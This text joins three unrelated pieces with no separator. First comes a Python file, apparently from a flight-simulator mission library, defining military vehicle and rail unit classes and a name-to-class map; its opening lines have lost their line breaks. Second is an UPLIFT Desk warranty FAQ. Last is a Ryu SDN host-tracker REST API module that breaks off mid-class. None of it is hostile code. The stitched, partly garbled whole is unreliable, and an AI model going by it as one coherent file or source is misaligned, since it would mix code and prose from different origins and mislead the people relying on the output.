eplrs = True class M1045_HMMWV_TOW(unittype.VehicleType): id = "M1045 HMMWV TOW" name = "ATGM HMMWV" detection_range = 0 threat_range = 3800 air_weapon_dist = 0 eplrs = True class M1126_Stryker_ICV(unittype.VehicleType): id = "M1126 Stryker ICV" name = "IFV M1126 Stryker ICV" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 eplrs = True class M_113(unittype.VehicleType): id = "M-113" name = "APC M113" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 eplrs = True class M1134_Stryker_ATGM(unittype.VehicleType): id = "M1134 Stryker ATGM" name = "ATGM Stryker" detection_range = 0 threat_range = 3800 air_weapon_dist = 1000 eplrs = True class M_2_Bradley(unittype.VehicleType): id = "M-2 Bradley" name = "IFV M2A2 Bradley" detection_range = 0 threat_range = 3800 air_weapon_dist = 2500 eplrs = True class MCV_80(unittype.VehicleType): id = "MCV-80" name = "IFV Warrior " detection_range = 0 threat_range = 2500 air_weapon_dist = 2500 class MTLB(unittype.VehicleType): id = "MTLB" name = "APC MTLB" detection_range = 0 threat_range = 1000 air_weapon_dist = 1000 class Marder(unittype.VehicleType): id = "Marder" name = "IFV Marder" detection_range = 0 threat_range = 1500 air_weapon_dist = 1500 class TPZ(unittype.VehicleType): id = "TPZ" name = "APC TPz Fuchs " detection_range = 0 threat_range = 1000 air_weapon_dist = 1000 class Challenger2(unittype.VehicleType): id = "Challenger2" name = "MBT Challenger II" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class Leclerc(unittype.VehicleType): id = "Leclerc" name = "MBT Leclerc" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class M_60(unittype.VehicleType): id = "M-60" name = "MBT M60A3 Patton" detection_range = 0 threat_range = 8000 air_weapon_dist = 1500 class M1128_Stryker_MGS(unittype.VehicleType): id = "M1128 Stryker MGS" name = "SPG Stryker MGS" detection_range = 0 threat_range = 4000 air_weapon_dist = 1200 eplrs = True class M_1_Abrams(unittype.VehicleType): id = "M-1 
Abrams" name = "MBT M1A2 Abrams" detection_range = 0 threat_range = 3500 air_weapon_dist = 1200 eplrs = True class T_55(unittype.VehicleType): id = "T-55" name = "MBT T-55" detection_range = 0 threat_range = 2500 air_weapon_dist = 1200 class T_72B(unittype.VehicleType): id = "T-72B" name = "MBT T-72B" detection_range = 0 threat_range = 4000 air_weapon_dist = 3500 class T_80UD(unittype.VehicleType): id = "T-80UD" name = "MBT T-80U" detection_range = 0 threat_range = 5000 air_weapon_dist = 3500 class T_90(unittype.VehicleType): id = "T-90" name = "MBT T-90" detection_range = 0 threat_range = 5000 air_weapon_dist = 3500 class Leopard1A3(unittype.VehicleType): id = "Leopard1A3" name = "MBT Leopard 1A3" detection_range = 0 threat_range = 2500 air_weapon_dist = 1500 class Merkava_Mk4(unittype.VehicleType): id = "Merkava_Mk4" name = "MBT Merkava IV" detection_range = 0 threat_range = 3500 air_weapon_dist = 1200 class M4_Sherman(unittype.VehicleType): id = "M4_Sherman" name = "Tk M4 Sherman" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class M2A1_halftrack(unittype.VehicleType): id = "M2A1_halftrack" name = "APC M2A1 Halftrack" detection_range = 0 threat_range = 1200 air_weapon_dist = 0 class T_72B3(unittype.VehicleType): id = "T-72B3" name = "MBT T-72B3" detection_range = 0 threat_range = 4000 air_weapon_dist = 3500 class BTR_82A(unittype.VehicleType): id = "BTR-82A" name = "IFV BTR-82A" detection_range = 0 threat_range = 2000 air_weapon_dist = 2000 class PT_76(unittype.VehicleType): id = "PT_76" name = "LT PT-76" detection_range = 0 threat_range = 2000 air_weapon_dist = 1000 class Chieftain_mk3(unittype.VehicleType): id = "Chieftain_mk3" name = "MBT Chieftain Mk.3" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class Pz_IV_H(unittype.VehicleType): id = "Pz_IV_H" name = "Tk PzIV H" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class Sd_Kfz_251(unittype.VehicleType): id = "Sd_Kfz_251" name = "APC Sd.Kfz.251 Halftrack" 
        detection_range = 0
        threat_range = 1100
        air_weapon_dist = 0

    class Leopard_2A5(unittype.VehicleType):
        id = "Leopard-2A5"
        name = "MBT Leopard-2A5"
        detection_range = 0
        threat_range = 3500
        air_weapon_dist = 1500

    class Leopard_2(unittype.VehicleType):
        id = "Leopard-2"
        name = "MBT Leopard-2A6M"
        detection_range = 0
        threat_range = 3500
        air_weapon_dist = 1500

    class Leopard_2A4(unittype.VehicleType):
        id = "leopard-2A4"
        name = "MBT Leopard-2A4"
        detection_range = 0
        threat_range = 3500
        air_weapon_dist = 1500

    class Leopard_2A4_trs(unittype.VehicleType):
        id = "leopard-2A4_trs"
        name = "MBT Leopard-2A4 Trs"
        detection_range = 0
        threat_range = 3500
        air_weapon_dist = 1500

    class VAB_Mephisto(unittype.VehicleType):
        id = "VAB_Mephisto"
        name = "ATGM VAB Mephisto"
        detection_range = 0
        threat_range = 3800
        air_weapon_dist = 3800
        eplrs = True

    class ZTZ96B(unittype.VehicleType):
        id = "ZTZ96B"
        name = "ZTZ-96B"
        detection_range = 0
        threat_range = 5000
        air_weapon_dist = 3500
        eplrs = True

    class ZBD04A(unittype.VehicleType):
        id = "ZBD04A"
        name = "ZBD-04A"
        detection_range = 0
        threat_range = 4800
        air_weapon_dist = 0
        eplrs = True

    class Tiger_I(unittype.VehicleType):
        id = "Tiger_I"
        name = "HT Pz.Kpfw.VI Tiger I"
        detection_range = 0
        threat_range = 3000
        air_weapon_dist = 0

    class Tiger_II_H(unittype.VehicleType):
        id = "Tiger_II_H"
        name = "HT Pz.Kpfw.VI Ausf. B Tiger II"
        detection_range = 0
        threat_range = 6000
        air_weapon_dist = 0

    class Pz_V_Panther_G(unittype.VehicleType):
        id = "Pz_V_Panther_G"
        name = "MT Pz.Kpfw.V Panther Ausf.G"
        detection_range = 0
        threat_range = 3000
        air_weapon_dist = 0

    class Jagdpanther_G1(unittype.VehicleType):
        id = "Jagdpanther_G1"
        name = "SPG Jagdpanther G1"
        detection_range = 0
        threat_range = 5000
        air_weapon_dist = 0

    class JagdPz_IV(unittype.VehicleType):
        id = "JagdPz_IV"
        name = "SPG Jagdpanzer IV"
        detection_range = 0
        threat_range = 3000
        air_weapon_dist = 0

    class Stug_IV(unittype.VehicleType):
        id = "Stug_IV"
        name = "SPG StuG IV"
        detection_range = 0
        threat_range = 3000
        air_weapon_dist = 0

    class SturmPzIV(unittype.VehicleType):
        id = "SturmPzIV"
        name = "SPG Sturmpanzer IV Brummbar"
        detection_range = 0
        threat_range = 4500
        air_weapon_dist = 2500

    class Sd_Kfz_234_2_Puma(unittype.VehicleType):
        id = "Sd_Kfz_234_2_Puma"
        name = "IFV Sd.Kfz.234/2 Puma"
        detection_range = 0
        threat_range = 2000
        air_weapon_dist = 0

    class Stug_III(unittype.VehicleType):
        id = "Stug_III"
        name = "SPG StuG III Ausf. G"
        detection_range = 0
        threat_range = 3000
        air_weapon_dist = 0

    class Elefant_SdKfz_184(unittype.VehicleType):
        id = "Elefant_SdKfz_184"
        name = "SPG Sd.Kfz.184 Elefant"
        detection_range = 0
        threat_range = 6000
        air_weapon_dist = 0

    class Cromwell_IV(unittype.VehicleType):
        id = "Cromwell_IV"
        name = "CT Cromwell IV"
        detection_range = 0
        threat_range = 3000
        air_weapon_dist = 0

    class M4A4_Sherman_FF(unittype.VehicleType):
        id = "M4A4_Sherman_FF"
        name = "MT M4A4 Sherman Firefly"
        detection_range = 0
        threat_range = 3000
        air_weapon_dist = 0

    class Centaur_IV(unittype.VehicleType):
        id = "Centaur_IV"
        name = "CT Centaur IV"
        detection_range = 0
        threat_range = 6000
        air_weapon_dist = 0

    class Churchill_VII(unittype.VehicleType):
        id = "Churchill_VII"
        name = "HIT Churchill VII"
        detection_range = 0
        threat_range = 3000
        air_weapon_dist = 0

    class Daimler_AC(unittype.VehicleType):
        id = "Daimler_AC"
        name = "Car Daimler Armored"
        detection_range = 0
        threat_range = 2000
        air_weapon_dist = 0

    class Tetrarch(unittype.VehicleType):
        id = "Tetrarch"
        name = "LT Mk VII Tetrarch"
        detection_range = 0
        threat_range = 2000
        air_weapon_dist = 0

    class M10_GMC(unittype.VehicleType):
        id = "M10_GMC"
        name = "SPG M10 GMC"
        detection_range = 0
        threat_range = 6000
        air_weapon_dist = 0

    class M8_Greyhound(unittype.VehicleType):
        id = "M8_Greyhound"
        name = "Car M8 Greyhound Armored"
        detection_range = 0
        threat_range = 2000
        air_weapon_dist = 0


class MissilesSS:

    class Scud_B(unittype.VehicleType):
        id = "Scud_B"
        name = "SSM SS-1C Scud-B"
        detection_range = 0
        threat_range = 320000
        air_weapon_dist = 320000

    class Hy_launcher(unittype.VehicleType):
        id = "hy_launcher"
        name = "AShM SS-N-2 Silkworm"
        detection_range = 100000
        threat_range = 100000
        air_weapon_dist = 100000

    class Silkworm_SR(unittype.VehicleType):
        id = "Silkworm_SR"
        name = "AShM Silkworm SR"
        detection_range = 200000
        threat_range = 0
        air_weapon_dist = 0

    class V1_launcher(unittype.VehicleType):
        id = "v1_launcher"
        name = "SSM V-1 Launcher"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0


class Locomotive:

    class Electric_locomotive(unittype.VehicleType):
        id = "Electric locomotive"
        name = "Loco VL80 Electric"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Locomotive(unittype.VehicleType):
        id = "Locomotive"
        name = "Loco CHME3T"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class ES44AH(unittype.VehicleType):
        id = "ES44AH"
        name = "Loco ES44AH"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class DRG_Class_86(unittype.VehicleType):
        id = "DRG_Class_86"
        name = "Loco DRG Class 86"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0


class Carriage:

    class Coach_cargo(unittype.VehicleType):
        id = "Coach cargo"
        name = "Freight Van"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Coach_cargo_open(unittype.VehicleType):
        id = "Coach cargo open"
        name = "Open Wagon"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Coach_a_tank_blue(unittype.VehicleType):
        id = "Coach a tank blue"
        name = "Tank Car blue"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Coach_a_tank_yellow(unittype.VehicleType):
        id = "Coach a tank yellow"
        name = "Tank Car yellow"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Coach_a_passenger(unittype.VehicleType):
        id = "Coach a passenger"
        name = "Passenger Car"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Coach_a_platform(unittype.VehicleType):
        id = "Coach a platform"
        name = "Coach Platform"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Boxcartrinity(unittype.VehicleType):
        id = "Boxcartrinity"
        name = "Flatcar"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Tankcartrinity(unittype.VehicleType):
        id = "Tankcartrinity"
        name = "Tank Cartrinity"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class Wellcarnsc(unittype.VehicleType):
        id = "Wellcarnsc"
        name = "Well Car"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class DR_50Ton_Flat_Wagon(unittype.VehicleType):
        id = "DR_50Ton_Flat_Wagon"
        name = "DR 50-ton flat wagon"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class German_covered_wagon_G10(unittype.VehicleType):
        id = "German_covered_wagon_G10"
        name = "Wagon G10 (Germany)"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0

    class German_tank_wagon(unittype.VehicleType):
        id = "German_tank_wagon"
        name = "Tank Car (Germany)"
        detection_range = 0
        threat_range = 0
        air_weapon_dist = 0


vehicle_map = {
    "2B11 mortar": Artillery._2B11_mortar,
    "SAU Gvozdika": Artillery.SAU_Gvozdika,
    "SAU Msta": Artillery.SAU_Msta,
    "SAU Akatsia": Artillery.SAU_Akatsia,
    "SAU 2-C9": Artillery.SAU_2_C9,
    "M-109": Artillery.M_109,
    "SpGH_Dana": Artillery.SpGH_Dana,
    "AAV7": Armor.AAV7,
    "BMD-1": Armor.BMD_1,
    "BMP-1": Armor.BMP_1,
    "BMP-2": Armor.BMP_2,
    "BMP-3": Armor.BMP_3,
    "BRDM-2": Armor.BRDM_2,
    "BTR-80": Armor.BTR_80,
    "BTR_D": Armor.BTR_D,
    "Cobra": Armor.Cobra,
    "LAV-25": Armor.LAV_25,
    "M1043 HMMWV Armament": Armor.M1043_HMMWV_Armament,
    "M1045 HMMWV TOW": Armor.M1045_HMMWV_TOW,
    "M1126 Stryker ICV": Armor.M1126_Stryker_ICV,
    "M-113": Armor.M_113,
    "M1134 Stryker ATGM": Armor.M1134_Stryker_ATGM,
    "M-2 Bradley": Armor.M_2_Bradley,
    "MCV-80": Armor.MCV_80,
    "MTLB": Armor.MTLB,
    "Marder": Armor.Marder,
    "TPZ": Armor.TPZ,
    "Grad_FDDM": Artillery.Grad_FDDM,
    "Bunker": Fortification.Bunker,
    "Paratrooper RPG-16": Infantry.Paratrooper_RPG_16,
    "Paratrooper AKS-74": Infantry.Paratrooper_AKS_74,
    "Infantry AK Ins": Infantry.Infantry_AK_Ins,
    "Sandbox": Fortification.Sandbox,
    "Soldier AK": Infantry.Soldier_AK,
    "Infantry AK": Infantry.Infantry_AK,
    "Soldier M249": Infantry.Soldier_M249,
    "Soldier M4": Infantry.Soldier_M4,
    "Soldier M4 GRG": Infantry.Soldier_M4_GRG,
    "Soldier RPG": Infantry.Soldier_RPG,
    "MLRS FDDM": Artillery.MLRS_FDDM,
    "Grad-URAL": Artillery.Grad_URAL,
    "Uragan_BM-27": Artillery.Uragan_BM_27,
    "Smerch": Artillery.Smerch,
    "Smerch_HE": Artillery.Smerch_HE,
    "MLRS": Artillery.MLRS,
    "2S6 Tunguska": AirDefence._2S6_Tunguska,
    "Kub 2P25 ln": AirDefence.Kub_2P25_ln,
"5p73 s-125 ln": AirDefence._5p73_s_125_ln, "S-300PS 5P85C ln": AirDefence.S_300PS_5P85C_ln, "S-300PS 5P85D ln": AirDefence.S_300PS_5P85D_ln, "SA-11 Buk LN 9A310M1": AirDefence.SA_11_Buk_LN_9A310M1, "Osa 9A33 ln": AirDefence.Osa_9A33_ln, "Tor 9A331": AirDefence.Tor_9A331, "Strela-10M3": AirDefence.Strela_10M3, "Strela-1 9P31": AirDefence.Strela_1_9P31, "SA-11 Buk CC 9S470M1": AirDefence.SA_11_Buk_CC_9S470M1, "SA-8 Osa LD 9T217": AirDefence.SA_8_Osa_LD_9T217, "Patriot AMG": AirDefence.Patriot_AMG, "Patriot ECS": AirDefence.Patriot_ECS, "Gepard": AirDefence.Gepard, "Hawk pcp": AirDefence.Hawk_pcp, "Vulcan": AirDefence.Vulcan, "Hawk ln": AirDefence.Hawk_ln, "M48 Chaparral": AirDefence.M48_Chaparral, "M6 Linebacker": AirDefence.M6_Linebacker, "Patriot ln": AirDefence.Patriot_ln, "M1097 Avenger": AirDefence.M1097_Avenger, "Patriot EPP": AirDefence.Patriot_EPP, "Patriot cp": AirDefence.Patriot_cp, "Roland ADS": AirDefence.Roland_ADS, "S-300PS 54K6 cp": AirDefence.S_300PS_54K6_cp, "Soldier stinger": AirDefence.Soldier_stinger, "Stinger comm dsr": AirDefence.Stinger_comm_dsr, "Stinger comm": AirDefence.Stinger_comm, "ZSU-23-4 Shilka": AirDefence.ZSU_23_4_Shilka, "ZU-23 Emplacement Closed": AirDefence.ZU_23_Emplacement_Closed, "ZU-23 Emplacement": AirDefence.ZU_23_Emplacement, "Ural-375 ZU-23": AirDefence.Ural_375_ZU_23, "ZU-23 Closed Insurgent": AirDefence.ZU_23_Closed_Insurgent, "Ural-375 ZU-23 Insurgent": AirDefence.Ural_375_ZU_23_Insurgent, "ZU-23 Insurgent": AirDefence.ZU_23_Insurgent, "SA-18 Igla manpad": AirDefence.SA_18_Igla_manpad, "SA-18 Igla comm": AirDefence.SA_18_Igla_comm, "SA-18 Igla-S manpad": AirDefence.SA_18_Igla_S_manpad, "SA-18 Igla-S comm": AirDefence.SA_18_Igla_S_comm, "Igla manpad INS": AirDefence.Igla_manpad_INS, "1L13 EWR": AirDefence._1L13_EWR, "Kub 1S91 str": AirDefence.Kub_1S91_str, "S-300PS 40B6M tr": AirDefence.S_300PS_40B6M_tr, "S-300PS 40B6MD sr": AirDefence.S_300PS_40B6MD_sr, "55G6 EWR": AirDefence._55G6_EWR, "S-300PS 64H6E sr": 
AirDefence.S_300PS_64H6E_sr, "SA-11 Buk SR 9S18M1": AirDefence.SA_11_Buk_SR_9S18M1, "Dog Ear radar": AirDefence.Dog_Ear_radar, "Hawk tr": AirDefence.Hawk_tr, "Hawk sr": AirDefence.Hawk_sr, "Patriot str": AirDefence.Patriot_str, "Hawk cwar": AirDefence.Hawk_cwar, "p-19 s-125 sr": AirDefence.P_19_s_125_sr, "Roland Radar": AirDefence.Roland_Radar, "snr s-125 tr": AirDefence.Snr_s_125_tr, "house1arm": Fortification.House1arm, "house2arm": Fortification.House2arm, "outpost_road": Fortification.Outpost_road, "outpost": Fortification.Outpost, "houseA_arm": Fortification.HouseA_arm, "TACAN_beacon": Fortification.TACAN_beacon, "Challenger2": Armor.Challenger2, "Leclerc": Armor.Leclerc, "M-60": Armor.M_60, "M1128 Stryker MGS": Armor.M1128_Stryker_MGS, "M-1 Abrams": Armor.M_1_Abrams, "T-55": Armor.T_55, "T-72B": Armor.T_72B, "T-80UD": Armor.T_80UD, "T-90": Armor.T_90, "Leopard1A3": Armor.Leopard1A3, "Merkava_Mk4": Armor.Merkava_Mk4, "Ural-4320 APA-5D": Unarmed.Ural_4320_APA_5D, "ATMZ-5": Unarmed.ATMZ_5, "ATZ-10": Unarmed.ATZ_10, "GAZ-3307": Unarmed.GAZ_3307, "GAZ-3308": Unarmed.GAZ_3308, "GAZ-66": Unarmed.GAZ_66, "M978 HEMTT Tanker": Unarmed.M978_HEMTT_Tanker, "HEMTT TFFT": Unarmed.HEMTT_TFFT, "IKARUS Bus": Unarmed.IKARUS_Bus, "KAMAZ Truck": Unarmed.KAMAZ_Truck, "LAZ Bus": Unarmed.LAZ_Bus, "LiAZ Bus": Unarmed.LiAZ_Bus, "Hummer": Unarmed.Hummer, "M 818": Unarmed.M_818, "MAZ-6303": Unarmed.MAZ_6303, "Predator GCS": Unarmed.Predator_GCS, "Predator TrojanSpirit": Unarmed.Predator_TrojanSpirit, "Suidae": Unarmed.Suidae, "Tigr_233036": Unarmed.Tigr_233036, "Trolley bus": Unarmed.Trolley_bus, "UAZ-469": Unarmed.UAZ_469, "Ural ATsP-6": Unarmed.Ural_ATsP_6, "Ural-4320-31": Unarmed.Ural_4320_31, "Ural-4320T": Unarmed.Ural_4320T, "Ural-375 PBU": Unarmed.Ural_375_PBU, "Ural-375": Unarmed.Ural_375, "VAZ Car": Unarmed.VAZ_Car, "ZiL-131 APA-80": Unarmed.ZiL_131_APA_80, "SKP-11": Unarmed.SKP_11, "ZIL-131 KUNG": Unarmed.ZIL_131_KUNG, "ZIL-4331": Unarmed.ZIL_4331, "KrAZ6322": Unarmed.KrAZ6322, 
"Electric locomotive": Locomotive.Electric_locomotive, "Locomotive": Locomotive.Locomotive, "Coach cargo": Carriage.Coach_cargo, "Coach cargo open": Carriage.Coach_cargo_open, "Coach a tank blue": Carriage.Coach_a_tank_blue, "Coach a tank yellow": Carriage.Coach_a_tank_yellow, "Coach a passenger": Carriage.Coach_a_passenger, "Coach a platform": Carriage.Coach_a_platform, "Scud_B": MissilesSS.Scud_B, "M4_Sherman": Armor.M4_Sherman, "M2A1_halftrack": Armor.M2A1_halftrack, "S_75M_Volhov": AirDefence.S_75M_Volhov, "SNR_75V": AirDefence.SNR_75V, "RLS_19J6": AirDefence.RLS_19J6, "ZSU_57_2": AirDefence.ZSU_57_2, "T-72B3": Armor.T_72B3, "BTR-82A": Armor.BTR_82A, "S-60_Type59_Artillery": AirDefence.S_60_Type59_Artillery, "generator_5i57": AirDefence.Generator_5i57, "ATZ-5": Unarmed.ATZ_5, "AA8": Unarmed.AA8, "PT_76": Armor.PT_76, "ATZ-60_Maz": Unarmed.ATZ_60_Maz, "ZIL-135": Unarmed.ZIL_135, "TZ-22_KrAZ": Unarmed.TZ_22_KrAZ, "Bedford_MWD": Unarmed.Bedford_MWD, "bofors40": AirDefence.Bofors40, "rapier_fsa_launcher": AirDefence.Rapier_fsa_launcher, "rapier_fsa_optical_tracker_unit": AirDefence.Rapier_fsa_optical_tracker_unit, "rapier_fsa_blindfire_radar": AirDefence.Rapier_fsa_blindfire_radar, "Land_Rover_101_FC": Unarmed.Land_Rover_101_FC, "Land_Rover_109_S3": Unarmed.Land_Rover_109_S3, "Chieftain_mk3": Armor.Chieftain_mk3, "hy_launcher": MissilesSS.Hy_launcher, "Silkworm_SR": MissilesSS.Silkworm_SR, "ES44AH": Locomotive.ES44AH, "Boxcartrinity": Carriage.Boxcartrinity, "Tankcartrinity": Carriage.Tankcartrinity, "Wellcarnsc": Carriage.Wellcarnsc, "Pz_IV_H": Armor.Pz_IV_H, "Sd_Kfz_251": Armor.Sd_Kfz_251, "flak18": AirDefence.Flak18, "Blitz_36-6700A": Unarmed.Blitz_36_6700A, "Leopard-2A5": Armor.Leopard_2A5, "Leopard-2": Armor.Leopard_2, "leopard-2A4": Armor.Leopard_2A4, "leopard-2A4_trs": Armor.Leopard_2A4_trs, "T155_Firtina": Artillery.T155_Firtina, "VAB_Mephisto": Armor.VAB_Mephisto, "ZTZ96B": Armor.ZTZ96B, "ZBD04A": Armor.ZBD04A, "HQ-7_LN_SP": AirDefence.HQ_7_LN_SP, 
"HQ-7_STR_SP": AirDefence.HQ_7_STR_SP, "PLZ05": Artillery.PLZ05, "Kubelwagen_82": Unarmed.Kubelwagen_82, "Sd_Kfz_2": Unarmed.Sd_Kfz_2, "Sd_Kfz_7": Unarmed.Sd_Kfz_7, "Horch_901_typ_40_kfz_21": Unarmed.Horch_901_typ_40_kfz_21, "Tiger_I": Armor.Tiger_I, "Tiger_II_H": Armor.Tiger_II_H, "Pz_V_Panther_G": Armor.Pz_V_Panther_G, "Jagdpanther_G1": Armor.Jagdpanther_G1, "JagdPz_IV": Armor.JagdPz_IV, "Stug_IV": Armor.Stug_IV, "SturmPzIV": Armor.SturmPzIV, "Sd_Kfz_234_2_Puma": Armor.Sd_Kfz_234_2_Puma, "flak30": AirDefence.Flak30, "flak36": AirDefence.Flak36, "flak37": AirDefence.Flak37, "flak38": AirDefence.Flak38, "KDO_Mod40": AirDefence.KDO_Mod40, "Flakscheinwerfer_37": AirDefence.Flakscheinwerfer_37, "Maschinensatz_33": AirDefence.Maschinensatz_33, "soldier_mauser98": Infantry.Soldier_mauser98, "SK_C_28_naval_gun": Fortification.SK_C_28_naval_gun, "fire_control": Fortification.Fire_control, "Stug_III": Armor.Stug_III, "Elefant_SdKfz_184": Armor.Elefant_SdKfz_184, "flak41": AirDefence.Flak41, "v1_launcher": MissilesSS.V1_launcher, "FuMG-401": AirDefence.FuMG_401, "FuSe-65": AirDefence.FuSe_65, "Cromwell_IV": Armor.Cromwell_IV, "M4A4_Sherman_FF": Armor.M4A4_Sherman_FF, "soldier_wwii_br_01": Infantry.Soldier_wwii_br_01, "Centaur_IV": Armor.Centaur_IV, "Churchill_VII": Armor.Churchill_VII, "Daimler_AC": Armor.Daimler_AC, "Tetrarch": Armor.Tetrarch, "QF_37_AA": AirDefence.QF_37_AA, "CCKW_353": Unarmed.CCKW_353, "Willys_MB": Unarmed.Willys_MB, "M12_GMC": Artillery.M12_GMC, "M30_CC": Unarmed.M30_CC, "soldier_wwii_us": Infantry.Soldier_wwii_us, "M10_GMC": Armor.M10_GMC, "M8_Greyhound": Armor.M8_Greyhound, "M4_Tractor": Unarmed.M4_Tractor, "M45_Quadmount": AirDefence.M45_Quadmount, "M1_37mm": AirDefence.M1_37mm, "DR_50Ton_Flat_Wagon": Carriage.DR_50Ton_Flat_Wagon, "DRG_Class_86": Locomotive.DRG_Class_86, "German_covered_wagon_G10": Carriage.German_covered_wagon_G10, "German_tank_wagon": Carriage.German_tank_wagon, }
We stand behind the quality of our desk frames, mechanisms, and electronics. In the rare event that you discover any defects or malfunctions in the desk frame, including the motor, metal/aluminum components, controller, switch, electronics, or anything else, let us know and we’ll make it right. Coverage begins on the day you receive your order, and applies to the original owner only.

How do I request warranty service?

Call us toll free at 1-800-349-3839 for warranty support. You can also email us at info@upliftdesk.com. When you contact us, please include your order number and an up-to-date shipping address. This will help us expedite the process, so you can get your issue fixed faster. If you bought from one of our resellers, you will need to contact the reseller directly and they will process your warranty request for you.

My desktop is damaged! What do I do?

If your desktop is unusable as a result of a manufacturer's defect or damage sustained in shipping, you are covered. In order for us to replace your desktop, we will need to provide the shipper with images of the damaged desktop and the shipping box. Please email these images with your warranty request to info@upliftdesk.com. If you received your desk by freight, you will need to sign that it was damaged upon delivery. Please take pictures of the box before disassembling the pallet, and submit them with your warranty request to info@upliftdesk.com. You do not need to reject the delivery.

If your desktop is looking dull or scratched as a result of normal wear and tear, your warranty also covers expert advice from our woodworker on care and restoration for your desktop to keep it looking its best.

I just got my frame, and there’s a problem with it. Can you help me?

If any part of your frame arrives damaged, we will work to replace the needed part. Please look over the frame box to see if there is any damage, and determine if all components are in the package.
If multiple parts of your frame have been damaged, the frame has been scratched, or a leg casing has opened and separated, we will replace the frame. To receive your replacement, place all the components you received back in the box, and approve a scheduled FedEx pickup.

So UPLIFT Desks are covered for 7 years. What about accessories?

If you receive any damaged or defective UPLIFT product, contact our warranty support team at 1-800-349-3839 or info@upliftdesk.com immediately. As with our desks, we warrant that our accessories are free from any defects in materials or workmanship. Coverage begins on the day you receive your order, and applies to the original owner only. The warranty terms for specific UPLIFT products are listed below.

What am I getting when I ask for warranty service?

Problems with our UPLIFT products are extremely rare, and we’re dedicated to making things right. We will replace items or parts at no cost to you, and ship them via standard ground service anywhere in the contiguous 48 United States for free, in most cases on the same or next business day. Expedited shipping is available at your expense. If you are outside the US48, you will be responsible for shipping charges only, regardless of method.

Warranty support for UPLIFT solid wood desktops includes not just assessment of any issues that may arise, but also expert advice from our woodworker on how to care for your desktop to keep it looking its best. You will play a big part in the life of your solid wood or custom wood desktop: handmade wood furniture requires some basic care and maintenance on your part to preserve its natural beauty and keep it in tip-top shape.

Note: The UPLIFT Limited Warranty covers parts only, and does not include labor costs. Extended warranty purchases are non-refundable after the 30-day standard return policy window has closed.
This warranty does not cover any problems which result from improper set-up, unauthorized modification, normal wear and tear, abuse, or force majeure, such as hurricanes or floods. Imperfections that occur naturally, such as those sometimes found in reclaimed or solid wood desktops, do not qualify for repairs or replacements. With love and care, wood desktops age well, but they do age, and their look may change over time.

The cost of repairing or replacing other property damaged in the event of an UPLIFT Desk product malfunctioning (consequential damages) and the cost of lost time or loss of use of your desk (incidental damages) are not recoverable under this warranty. Some states do not allow the exclusion or limitation of incidental or consequential damages, so this limitation or exclusion may not apply to you.

What if I'm outside the warranty coverage?

Feel free to contact us at 1-800-349-3839 or info@upliftdesk.com and we will advise you on steps you can take to remedy the problem.

I bought a desk several years ago. Am I still covered?

The standing warranties for current and previous UPLIFT Desk models are listed below. To ensure prompt and complete warranty support, please notify us of any issues, desktop defects, or damage that may have occurred in shipping within 30 days of receipt. Desktops require proper care and maintenance, and we recommend taking these steps to keep yours looking great. If you do have issues later down the road, we offer replacement desktops to existing customers at a reduced cost. Reach out to our Support Team to see your options for replacing your desktop.
# Copyright (C) 2014 SDN Hub
#
# Licensed under the GNU GENERAL PUBLIC LICENSE, Version 3.
# You may not use this file except in compliance with this License.
# You may obtain a copy of the License at
#
#    http://www.gnu.org/licenses/gpl-3.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.

# REST API
#
# ############# Host tracker ##############
#
# - get all hosts
#   GET /hosts
#
# - get all hosts associated with a switch
#   GET /hosts/{dpid}
#

import logging
import json
import time

from webob import Response

from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.controller import dpset
from ryu.app.wsgi import ControllerBase, WSGIApplication, route
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ipv4
from ryu.ofproto import ether
from ryu.ofproto import ofproto_v1_0, ofproto_v1_3
from ryu.app.sdnhub_apps import host_tracker
from ryu.lib import dpid as dpid_lib


class HostTrackerController(ControllerBase):
    def __init__(self, req, link, data, **config):
        super(HostTrackerController, self).__init__(req, link, data, **config)
        self.host_tracker = data['host_tracker']
        self.dpset = data['dpset']

    @route('hosts', '/v1.0/hosts', methods=['GET'])
    def get_all_hosts(self, req, **kwargs):
        return Response(status=200, content_type='application/json',
                        body=json.dumps(self.host_tracker.hosts))

    @route('hosts', '/v1.0/hosts/{dpid}', methods=['GET'])
    # requirements={'dpid': dpid_lib.DPID_PATTERN})
    def get_hosts(self, req, dpid, **_kwargs):
        dp = self.dpset.get(int(dpid))
        if dp is None:
            return Response(status=404)

        switch_hosts = {}
        for key, val in self.host_tracker.hosts.iteritems():
            if val['dpid'] == dpid_lib.dpid_to_str(dp.id):
                switch_hosts[key] = val

        return Response(status=200, content_type='application/json',
                        body=json.dumps(switch_hosts))


class HostTrackerRestApi(app_manager.RyuApp):
    OFP_VERSIONS = [ofproto_v1_0.OFP_VERSION, ofproto_v1_3.OFP_VERSION]
    _CONTEXTS = {
        'dpset': dpset.DPSet,
        'wsgi': WSGIApplication,
